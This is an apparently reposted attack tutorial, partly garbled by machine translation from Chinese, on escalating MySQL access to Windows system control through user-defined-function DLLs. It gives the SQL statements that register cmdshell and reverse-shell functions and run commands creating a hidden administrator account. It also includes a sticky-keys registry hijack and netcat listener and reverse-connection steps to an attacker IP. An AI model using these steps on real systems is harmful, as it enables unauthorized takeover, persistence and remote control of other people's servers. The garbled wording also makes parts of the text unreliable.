The first part Hack58 see, do not know the original author, the following section is picked from the Internet, such as copyright infringement, please leave a message. First, the function: the use of custom function MYSQL function (again: the use of MYSQL UDF is definitely not mention the right to overflow, but a function MYSQL itself), will be converted to MYSQL account system system permissions. Second, Applications: 1 target system is Windows (Win2000, XP, Win2003); 2 MYSQL you already have a user's account, this account must have permission to insert and delete mysql to create and drop functions (MYSQL documentation. primitive).
Third, use the help:
The first step: upload PHP files to the target machine, fill in your account by the line connecting MYSQL.
Step Two: After a successful connection, exported DLL file, do not necessarily pay attention to the export path when you export (under normal circumstances may write to any directory, regardless of the rights issue), for more than MYSQL5.0 version, you must export the DLL to the target the machine's system directory (win or system32), otherwise the next step you will see "No paths allowed for shared library" error.
Step 3: Create function function using SQL statements. Syntax: Create Function function name (function name can only be one of the following list) returns string soname 'exported DLL path'; For more than MYSQL5.0 version of the DLL statement does not allow the full path, if you the second step has been exported by the DLL to the system directory, then you can omit the path command was executed normally, otherwise you will see "can not open shared library" error, then you will have to re-export the DLL to the system table of Contents.
Step 4: Create a performance function correctly, you can use SQL statements to use these functions a. Syntax: function name ( 'parameter list') select created; each function has different parameters, you can use the select function name created ( 'help'); to get information for the specified function parameter list.
Fourth, the performance function Description:
cmdshell execute cmd;
Downloader downloader, to download the specified online and save files to a specified directory;
open3389 common 3389 Terminal Services, you can specify the port (do not change the port without having to restart);
BACKSHELL rebound Shell;
ProcessView enumeration system processes;
KillProcess terminates the specified process;
regread read the registry;
RegWrite write the registry;
Shut shut down, log off, restart;
the About instructions and help functions;
写注册表函数.
select regwrite(“HKEY_LOCAL_MACHINE”,”SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe”,”Debugger”,”REG_SZ”,”E:\web\170stock\admin\include\explorer.exe”);
C: Winntudf.dll 2000
C: 2003 Windowsudf.dll
now substantially win server on both derived UDF.DLL
Create function Returns the cmdshell the soname String 'udf.dll'
SELECT the cmdshell ( 'User Admins NET 226 404 553 / the Add');
the cmdshell SELECT ( 'NET localgroup Administrators Admins / the Add');
SELECT the cmdshell ( 'C: 3389.exe');
drop function the cmdshell; delete function
select cmdshell ( 'netstat -an') ;
三:Mix.dll提权
WEBSHELL获得了,找用户和密码也不是什么难事。现在我拿我另外一台机器做示范,已经把PHPSHELL传上去了,一般来说连接MYSQL的帐户密码很好找,随便编辑一个PHP文件,就看到了。
看 到了吧,用户名:root 密码:123456 库名:php 然后怎么办呢?先用SQL Query 建立连接,哈连接成功了,现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密 码就可获得CMDSHELL。好,不多说了,传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname ‘d:\php\php\Mix.dll’; 来注册函数.
出现SQL语句成功执行!
CMDSHELL not far away to get, let's listen for a port in the local NC with first, Nc -l -p 1234 (I do not think this screenshot of it) and then executes the statement: select Mixconnect ( '192.168.1.254', '1234 '); to activate that function is performed successfully, and then see if we have the NC did not reflect the success obtained CMSHELL, but then the other of suspended animation has been slightly MYSQL, MYSQL service process we want to kill off, and then restart the service MYSQL job otherwise found that the site administrators can not run, then. . . . If the server does not allow connections to any external IP and port, while his 3306 Foreign port is open! Then My_udf.dll in respect of play, using the same methods and Mix, execute the following statement after the connection MYSQL success: create function my_udfdoor returns string soname ' D: \ php \ phpmy_udf.dll'; After the success of the implementation of the statement, and then we started this activation function, input statement: select my_udfdoor ( "); and then nc connection port 3306, and then enter a cmdshell fuck you can get a
privilege escalation aspect (mix.dll mention the right)
D: /usr/www/html/mix.dll mysql -h target ip -uroot -p c: mysql.txt select Mixconnect ( 'bounce ip', 'Port'); nc -vv -l -p 1983.